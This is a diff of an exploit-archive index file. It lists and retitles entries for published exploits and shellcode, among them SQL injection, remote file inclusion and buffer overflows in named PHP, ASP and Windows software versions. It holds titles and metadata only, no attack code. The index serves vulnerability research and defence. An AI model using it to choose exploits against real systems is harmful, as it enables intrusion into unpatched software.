40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16451,7 +16458,7 @@ id,file,description,date,author,platform,type,port
2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0
2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0
2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0
2259,platforms/php/webapps/2259.txt,"proManager 0.73 - (note.php) SQL Injection",2006-08-26,Kacper,php,webapps,0
2259,platforms/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,php,webapps,0
2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion",2006-08-27,Kacper,php,webapps,0
2261,platforms/php/webapps/2261.php,"iziContents RC6 - GLOBALS[] Remote Code Execution",2006-08-27,Kacper,php,webapps,0
2262,platforms/php/webapps/2262.php,"CMS Frogss 0.4 - (podpis) SQL Injection",2006-08-27,Kacper,php,webapps,0
@ -16573,7 +16580,7 @@ id,file,description,date,author,platform,type,port
2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0
2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Parameter Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0
2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0
2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - (nbs) Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0
2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0
2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - (dix.php3) Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0
2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion",2006-09-21,Solpot,php,webapps,0
2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - (RR.php) Remote File Inclusion",2006-09-21,Kacper,php,webapps,0
@ -16735,7 +16742,7 @@ id,file,description,date,author,platform,type,port
2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - (explorer_load_lang.php) Local File Inclusion",2006-10-19,Kacper,php,webapps,0
2599,platforms/php/webapps/2599.txt,"pandaBB - (displayCategory) Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0
2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - (themesdir) Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0
2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - (config.inc.php3) File Inclusion",2006-10-19,x_w0x,php,webapps,0
2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion",2006-10-19,x_w0x,php,webapps,0
2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - (admin_module.php) Remote File Inclusion",2006-10-20,MP,php,webapps,0
2604,platforms/php/webapps/2604.txt,"WGCC 0.5.6b - (quiz.php) SQL Injection",2006-10-20,ajann,php,webapps,0
2605,platforms/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0
@ -17238,7 +17245,7 @@ id,file,description,date,author,platform,type,port
3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - (result.php surv) Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0
3357,platforms/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,php,webapps,0
3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - (index.php func) Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps,0
3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - (path_to_smf) Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps,0
3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps,0
3365,platforms/php/webapps/3365.txt,"FCRing 1.31 - (fcring.php s_fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0
3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - (sinagb.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0
3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - (sinapis.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0
@ -17393,7 +17400,7 @@ id,file,description,date,author,platform,type,port
3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0
3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - (camid) SQL Injection",2007-04-01,ajann,php,webapps,0
3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - (genre.php) Blind SQL Injection",2007-04-01,ajann,php,webapps,0
3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - (news.php newsid) SQL Injection",2007-04-01,Dj7xpl,php,webapps,0
3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection",2007-04-01,Dj7xpl,php,webapps,0
3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,php,webapps,0
3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection",2007-04-01,ajann,php,webapps,0
3638,platforms/php/webapps/3638.txt,"MapLab MS4W 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0
@ -17581,14 +17588,14 @@ id,file,description,date,author,platform,type,port
3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0
3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0
3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0
3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - (atk.inc config_atkroot) Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0
3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - 'config_atkroot' Parameter Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0
3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager 1.21 - Blind SQL Injection",2007-05-15,ajann,php,webapps,0
3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,php,webapps,0
3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps,0
3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0
3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0
3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0
3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - (print.php newnr) SQL Injection",2007-05-16,Silentz,php,webapps,0
3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' Parameter SQL Injection",2007-05-16,Silentz,php,webapps,0
3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0
3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0
3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0
@ -17771,7 +17778,7 @@ id,file,description,date,author,platform,type,port
4264,platforms/cgi/webapps/4264.txt,"Cartweaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0
4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0
4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0
4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0
4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0
4269,platforms/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0
4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0
4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - (archive.php) Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0
@ -17994,7 +18001,7 @@ id,file,description,date,author,platform,type,port
4627,platforms/php/webapps/4627.txt,"ProfileCMS 1.0 - 'id' SQL Injection",2007-11-16,K-159,php,webapps,0
4628,platforms/php/webapps/4628.txt,"Myspace Clone Script - 'index.php' Remote File Inclusion",2007-11-16,VerY-SecReT,php,webapps,0
4629,platforms/php/webapps/4629.txt,"net-finity - 'links.php' SQL Injection",2007-11-16,VerY-SecReT,php,webapps,0
4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - (index.php action) Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0
4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - 'action' Parameter Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0
4631,platforms/php/webapps/4631.txt,"phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0
4632,platforms/php/webapps/4632.txt,"Vigile CMS 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0
4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script - SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0
@ -18335,7 +18342,7 @@ id,file,description,date,author,platform,type,port
5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0
5099,platforms/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' Parameters SQL Injection",2008-02-10,halkfild,php,webapps,0
5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - 'cat' Parameter SQL Injection",2008-02-12,NTOS-Team,php,webapps,0
5103,platforms/php/webapps/5103.txt,"Joomla! Component rapidrecipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
5103,platforms/php/webapps/5103.txt,"Joomla! Component Rapid Recipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
5104,platforms/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,php,webapps,0
5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0
@ -18810,61 +18817,61 @@ id,file,description,date,author,platform,type,port
5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
5714,platforms/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0
5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0
5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting",2008-06-01,"CWH Underground",php,webapps,0
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0
5719,platforms/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
5721,platforms/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0
5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion",2008-06-02,HaiHui,php,webapps,0
5723,platforms/php/webapps/5723.txt,"Joomla! Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps,0
5724,platforms/php/webapps/5724.txt,"pLog - 'albumID' SQL Injection",2008-06-02,DreamTurk,php,webapps,0
5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0
5724,platforms/php/webapps/5724.txt,"PLog 1.0.6 - 'albumID' Parameter SQL Injection",2008-06-02,DreamTurk,php,webapps,0
5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - SQL Injection / Cross-Site Scripting",2008-06-02,"CWH Underground",php,webapps,0
5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b - Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps,0
5729,platforms/php/webapps/5729.txt,"Joomla! Component joomradio 1.0 - 'id' SQL Injection",2008-06-03,His0k4,php,webapps,0
5729,platforms/php/webapps/5729.txt,"Joomla! Component JoomRadio 1.0 - 'id' Parameter SQL Injection",2008-06-03,His0k4,php,webapps,0
5730,platforms/php/webapps/5730.txt,"Joomla! Component iDoBlog b24 - SQL Injection",2008-06-03,His0k4,php,webapps,0
5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - (comment.asp) SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0
5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - 'comment.asp' SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0
5733,platforms/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0
5734,platforms/php/webapps/5734.pl,"Joomla! Component JooBlog 0.1.1 - Blind SQL Injection",2008-06-03,His0k4,php,webapps,0
5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script - Code Execution",2008-06-03,JIKO,php,webapps,0
5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script 1.0.1 - Code Execution",2008-06-03,JIKO,php,webapps,0
5737,platforms/php/webapps/5737.pl,"Joomla! Component Jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,php,webapps,0
5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0
5740,platforms/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - (gbid) SQL Injection",2008-06-04,ZAMUT,php,webapps,0
5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0
5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting",2008-06-04,"CWH Underground",php,webapps,0
5740,platforms/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - 'gbid' Parameter SQL Injection",2008-06-04,ZAMUT,php,webapps,0
5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - SQL Injection / Cross-Site Scripting",2008-06-05,"CWH Underground",php,webapps,0
5743,platforms/php/webapps/5743.txt,"Joomla! Component SimpleShop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0
5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - (css_str) SQL Injection",2008-06-05,MustLive,php,webapps,0
5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - (shownews) SQL Injection",2008-06-05,anonymous,php,webapps,0
5748,platforms/php/webapps/5748.txt,"Joomla! Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0
5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - 'css_str' Parameter SQL Injection",2008-06-05,MustLive,php,webapps,0
5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - 'shownews' Parameter SQL Injection",2008-06-05,anonymous,php,webapps,0
5748,platforms/php/webapps/5748.txt,"Joomla! Component JoomlaDate 1.2 - 'user' Parameter SQL Injection",2008-06-05,His0k4,php,webapps,0
5752,platforms/php/webapps/5752.pl,"Joomla! Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0
5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0
5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
5755,platforms/php/webapps/5755.pl,"Joomla! Component yvcomment 1.16 - Blind SQL Injection",2008-06-08,His0k4,php,webapps,0
5753,platforms/asp/webapps/5753.txt,"JiRo's FAQ Manager eXperience 1.0 - 'fID' Parameter SQL Injection",2008-06-08,Zigma,asp,webapps,0
5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - Local File Inclusion / Cross-Site Scripting",2008-06-08,"CWH Underground",php,webapps,0
5755,platforms/php/webapps/5755.pl,"Joomla! Component yvComment 1.16 - Blind SQL Injection",2008-06-08,His0k4,php,webapps,0
5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - 'Filename' File Disclosure",2008-06-08,MEEKAAH,php,webapps,0
5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 - (clients.php) Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0
5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0
5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion",2008-06-08,StAkeR,php,webapps,0
5759,platforms/php/webapps/5759.txt,"Joomla! Component rapidrecipe - SQL Injection",2008-06-08,His0k4,php,webapps,0
5759,platforms/php/webapps/5759.txt,"Joomla! Component Rapid Recipe 1.6.6/1.6.7 - SQL Injection",2008-06-08,His0k4,php,webapps,0
5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager 1.0 - SQL Injection",2008-06-09,Stack,php,webapps,0
5761,platforms/php/webapps/5761.pl,"Joomla! Component iJoomla! News Portal - 'itemID' SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0
5761,platforms/php/webapps/5761.pl,"Joomla! Component iJoomla News Portal 1.0 - 'itemID' Parameter SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0
5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - 'config.php' Local File Inclusion",2008-06-09,Stack,php,webapps,0
5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0
5764,platforms/php/webapps/5764.txt,"telephone directory 2008 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0
5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - (article) SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0
5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - SQL Injection / Cross-Site Scripting",2008-06-09,JosS,asp,webapps,0
5764,platforms/php/webapps/5764.txt,"Telephone Directory 2008 - SQL Injection / Cross-Site Scripting",2008-06-09,"CWH Underground",php,webapps,0
5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - 'article' Parameter SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0
5766,platforms/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0
5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - (loadsave.php) Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps,0
5768,platforms/php/webapps/5768.txt,"pNews 2.08 - (shownews) SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0
5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps,0
5768,platforms/php/webapps/5768.txt,"pNews 2.08 - 'shownews' Parameter SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0
5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0
5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - 'FCKeditor' Arbitrary File Upload",2008-06-09,EgiX,php,webapps,0
5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - (css) Local File Inclusion",2008-06-10,Unohope,php,webapps,0
5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0
5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection",2008-06-10,Unohope,php,webapps,0
5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' SQL Injection",2008-06-10,JosS,php,webapps,0
5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - (answer.php) SQL Injection",2008-06-10,"CWH Underground",php,webapps,0
5779,platforms/php/webapps/5779.txt,"SyndeoCMS 2.6.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0
5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - Local File Inclusion",2008-06-10,Unohope,php,webapps,0
5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - SQL Injection",2008-06-10,Unohope,php,webapps,0
5773,platforms/php/webapps/5773.txt,"Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection",2008-06-10,Unohope,php,webapps,0
5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - SQL Injection",2008-06-10,Unohope,php,webapps,0
5775,platforms/asp/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' Parameter SQL Injection",2008-06-10,JosS,asp,webapps,0
5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - 'answer.php' SQL Injection",2008-06-10,"CWH Underground",php,webapps,0
5779,platforms/php/webapps/5779.txt,"SyndeoCMS 2.6.0 - Local File Inclusion / Cross-Site Scripting",2008-06-10,"CWH Underground",php,webapps,0
5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account",2008-06-10,Zigma,asp,webapps,0
5781,platforms/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection",2008-06-10,Bl@ckbe@rD,asp,webapps,0
5782,platforms/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion",2008-06-10,"CWH Underground",php,webapps,0
5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' SQL Injection",2008-06-10,RMx,php,webapps,0
5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar - 'board' Parameter SQL Injection",2008-06-10,RMx,php,webapps,0
5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusion",2008-06-11,"CWH Underground",php,webapps,0
5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - (toplists.php list) SQL Injection",2008-06-11,Mr.SQL,php,webapps,0
5785,platforms/php/webapps/5785.txt,"eFiction 3.0 - 'toplists.php' SQL Injection",2008-06-11,Mr.SQL,php,webapps,0
5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0
5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0
5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0
@ -19039,7 +19046,7 @@ id,file,description,date,author,platform,type,port
5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0
5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) SQL Injection",2008-06-30,DNX,php,webapps,0
5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0
5980,platforms/php/webapps/5980.txt,"Mambo Component 'com_n-gallery' - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
@ -19369,7 +19376,7 @@ id,file,description,date,author,platform,type,port
6444,platforms/php/webapps/6444.txt,"iBoutique 4.0 - (cat) SQL Injection",2008-09-12,r45c4l,php,webapps,0
6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 - (register.php) Arbitrary Add Editor",2008-09-12,mr.al7rbi,php,webapps,0
6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script 1.0 - 'cat_id' SQL Injection",2008-09-12,FIREH4CK3R,php,webapps,0
6447,platforms/php/webapps/6447.txt,"pNews 2.03 - (newsid) SQL Injection",2008-09-12,r45c4l,php,webapps,0
6447,platforms/php/webapps/6447.txt,"pNews 2.03 - 'newsid' Parameter SQL Injection",2008-09-12,r45c4l,php,webapps,0
6448,platforms/php/webapps/6448.txt,"WebPortal CMS 0.7.4 - 'FCKeditor' Arbitrary File Upload",2008-09-12,S.W.A.T.,php,webapps,0
6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Blind SQL Injection",2008-09-13,Stack,php,webapps,0
6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
@ -19870,7 +19877,7 @@ id,file,description,date,author,platform,type,port
7075,platforms/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-09,"Andreas Kurtz",jsp,webapps,0
7076,platforms/php/webapps/7076.txt,"Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities",2008-11-10,USH,php,webapps,0
7077,platforms/php/webapps/7077.txt,"OTManager CMS 2.4 - (Tipo) Remote File Inclusion",2008-11-10,Colt7r,php,webapps,0
7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0
7078,platforms/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection",2008-11-10,boom3rang,php,webapps,0
7079,platforms/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0
7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0
7081,platforms/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0
@ -20161,7 +20168,7 @@ id,file,description,date,author,platform,type,port
7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
